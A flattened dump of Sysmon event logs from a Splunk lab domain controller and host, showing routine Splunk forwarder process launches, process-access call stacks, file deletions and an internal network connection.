11:00:20.623{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.623{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.623{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.623{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.623{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-13C4-6216-7C06-000000003802}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.623{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13C4-6216-7C06-000000003802}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.625{C8EA50B7-13C4-6216-7C06-000000003802}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.360{C8EA50B7-13C4-6216-7B06-000000003802}58841020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.048{C8EA50B7-13C3-6216-7A06-000000003802}63806252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.045{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13C4-6216-7B06-000000003802}5884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.034{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.034{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.034{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.034{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.028{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-13C4-6216-7B06-000000003802}5884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.019{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13C4-6216-7B06-000000003802}5884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.018{C8EA50B7-13C4-6216-7B06-000000003802}5884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.780{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=636B0424BBACEA2FFF10D3AEE95AB18E,SHA256=9211D96FFD6C56C63B03FD123368706919CF91B6DD720FC387B6370498F138DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:21.623{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C48D7C2A9895CBE390E7823CA8BFF7F9,SHA256=86B9362BC9300430DB555C94638F2E5BE163B8C0DED678A054C35F873E72C179,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13C5-6216-7D06-000000003802}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-13C5-6216-7D06-000000003802}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.211{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13C5-6216-7D06-000000003802}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.213{C8EA50B7-13C5-6216-7D06-000000003802}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000293976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:18.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53848-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:21.023{C8EA50B7-13C4-6216-7C06-000000003802}67086268C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:22.638{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 